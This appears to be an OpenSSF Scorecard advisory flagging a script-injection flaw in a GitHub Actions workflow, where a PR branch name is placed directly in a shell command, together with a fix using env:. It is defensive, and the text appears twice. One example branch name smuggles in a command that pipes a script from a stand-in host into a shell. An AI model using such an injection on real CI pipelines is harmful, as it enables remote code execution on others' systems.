Dangerous-Workflow findings — OpenSSF Scorecard
OpenSSF Scorecard flagged this repository for dangerous GitHub Actions workflow patterns (score: 0/10, scan date: 2026-03-31, commit a0865951).
Finding(s)
Warn: script injection with untrusted input ' github.event.pull_request.head.ref ': .github/workflows/promotion-checker.yml:40
github.event.pull_request.head.ref and github.head_ref are PR branch names fully controlled by the PR submitter. Interpolating them directly into a run: shell command allows an attacker to inject arbitrary shell code by naming their branch maliciously (e.g. a"; curl evil.sh | sh; echo ").
How to fix
Pass the value through env: rather than interpolating it directly in the shell expression — this prevents expression injection:
# Before (unsafe)
run: some-command ${{ github.event.pull_request.head.ref }}
# After (safe)
env:
HEAD_REF: ${{ github.event.pull_request.head.ref }}
run: some-command "$HEAD_REF"References
Identified by internal OpenSSF Scorecard scanning.
Dangerous-Workflow findings — OpenSSF Scorecard
OpenSSF Scorecard flagged this repository for dangerous GitHub Actions workflow patterns (score: 0/10, scan date: 2026-03-31, commit
a0865951).Finding(s)
Warn: script injection with untrusted input ' github.event.pull_request.head.ref ': .github/workflows/promotion-checker.yml:40github.event.pull_request.head.refandgithub.head_refare PR branch names fully controlled by the PR submitter. Interpolating them directly into arun:shell command allows an attacker to inject arbitrary shell code by naming their branch maliciously (e.g.a"; curl evil.sh | sh; echo ").How to fix
Pass the value through
env:rather than interpolating it directly in the shell expression — this prevents expression injection:References
Identified by internal OpenSSF Scorecard scanning.